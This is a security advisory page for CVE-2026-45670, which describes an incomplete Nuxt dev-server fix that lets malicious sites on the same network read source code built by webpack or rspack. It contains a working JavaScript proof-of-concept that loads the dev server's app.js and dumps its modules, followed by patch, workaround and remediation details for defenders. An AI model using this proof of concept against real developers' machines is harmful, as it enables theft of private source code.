CVE-2026-45670: Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)

Published May 19, 2026
·
Updated

Summary This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.

Details The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins.

Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected.

PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run npm run dev 1. Open http://localhost:3000 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console.

js const script = document.createElement('script') script.src = 'http://192.168.0.31:3000/nuxt/app.js' // NOTE: replace with the IP address the dev server listens to script.addEventListener('load', () => { const key = Object.keys(window).find(k => k.startsWith("webpackChunk")) for (const page in window[key]) { const moduleList = window[key][page][1] console.log(moduleList)

for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) (This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name)

Impact Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host.

This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to the local network access restriction feature.

Patches Fixed in nuxt@4.4.6 and nuxt@3.21.6 by #35051. The dev-middleware same-origin check now falls back to comparing the request's Origin / Referer host against Host when Sec-Fetch- headers are absent, closing the non-trustworthy-origin bypass.

The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.

Workarounds If you cannot upgrade immediately:

- Don't use nuxt dev --host. Bind the dev server to localhost (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks. - Use Chrome 142+ or another Chromium-based browser that enforces local network access restrictions. - Switch to the Vite builder for development.

Other sources

Nuxt is an open-source web development framework for Vue.js. In @nuxt/rspack-builder and @nuxt/webpack-builder versions 3.15.4 to before 3.21.6, and 4.0.0-alpha.1 to before 4.4.6, there is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network. This issue has been patched in versions 3.21.6 and 4.4.6.

MITRE

Affected Software

8 affected componentsFixes available
npm/@nuxt/webpack-builder>=4.0.0-alpha.1<=4.4.5
4.4.6
npm/@nuxt/webpack-builder>=3.15.4<=3.21.5
3.21.6
npm/@nuxt/rspack-builder>=4.0.0-alpha.1<=4.4.5
4.4.6
npm/@nuxt/rspack-builder>=3.15.4<=3.21.5
3.21.6
Nuxt Nuxt\/rspack-builder Node.js>=3.12.2<3.21.5
Nuxt Nuxt\/rspack-builder Node.js>=4.0.0<4.4.5
Nuxt Nuxt\/webpack-builder Node.js>=3.0.0<3.21.5
Nuxt Nuxt\/webpack-builder Node.js>=4.0.0<4.4.5

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/@nuxt/webpack-builder to a version that resolves this vulnerability.

    Fixed in 4.4.6
  2. Upgrade

    Upgrade npm/@nuxt/webpack-builder to a version that resolves this vulnerability.

    Fixed in 3.21.6
  3. Upgrade

    Upgrade npm/@nuxt/rspack-builder to a version that resolves this vulnerability.

    Fixed in 4.4.6
  4. Upgrade

    Upgrade npm/@nuxt/rspack-builder to a version that resolves this vulnerability.

    Fixed in 3.21.6
  5. Configuration

    Do not run the dev server bound to a non-loopback address (avoid using `nuxt dev --host`). Bind the dev server to localhost (the default). If remote access is required, tunnel from other devices via SSH or use a reverse proxy that enforces same-origin checks.

    nuxt dev server host = localhost
  6. Configuration

    Use the Vite builder for development instead of the webpack/rspack builders, as the default Vite builder was not affected.

    Nuxt builder builder = vite
  7. Compensating control

    Tunnel access from other devices via SSH or place a reverse proxy in front of the dev server that enforces same-origin checks.

  8. Compensating control

    Use Chrome 142+ or another Chromium-based browser that enforces local network access restrictions to mitigate exposure for clients.

Event History

May 19, 2026
Advisory Published
via GitHub·03:51 PM
Data Sourced
via GitHub·03:51 PM
DescriptionWeaknessAffected Software
Jun 12, 2026
CVE Published
via MITRE·12:51 PM
Data Sourced
via MITRE·12:51 PM
DescriptionWeakness
Data Sourced
via NVD·02:16 PM
DescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-45670?

CVE-2026-45670 has a risk score of 33, indicating a moderate severity level.

2

How does CVE-2026-45670 affect my project?

CVE-2026-45670 allows for the potential theft of source code during development if the dev server is exposed to non-loopback addresses.

3

How do I fix CVE-2026-45670?

To remediate CVE-2026-45670, ensure that the development server is not bound to non-loopback addresses when using the webpack or rspack builder.

4

Which software is affected by CVE-2026-45670?

CVE-2026-45670 affects npm packages @nuxt/webpack-builder and @nuxt/rspack-builder.

5

Is there a workaround for CVE-2026-45670?

A practical workaround for CVE-2026-45670 is to configure the development server to bind only to the loopback interface.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203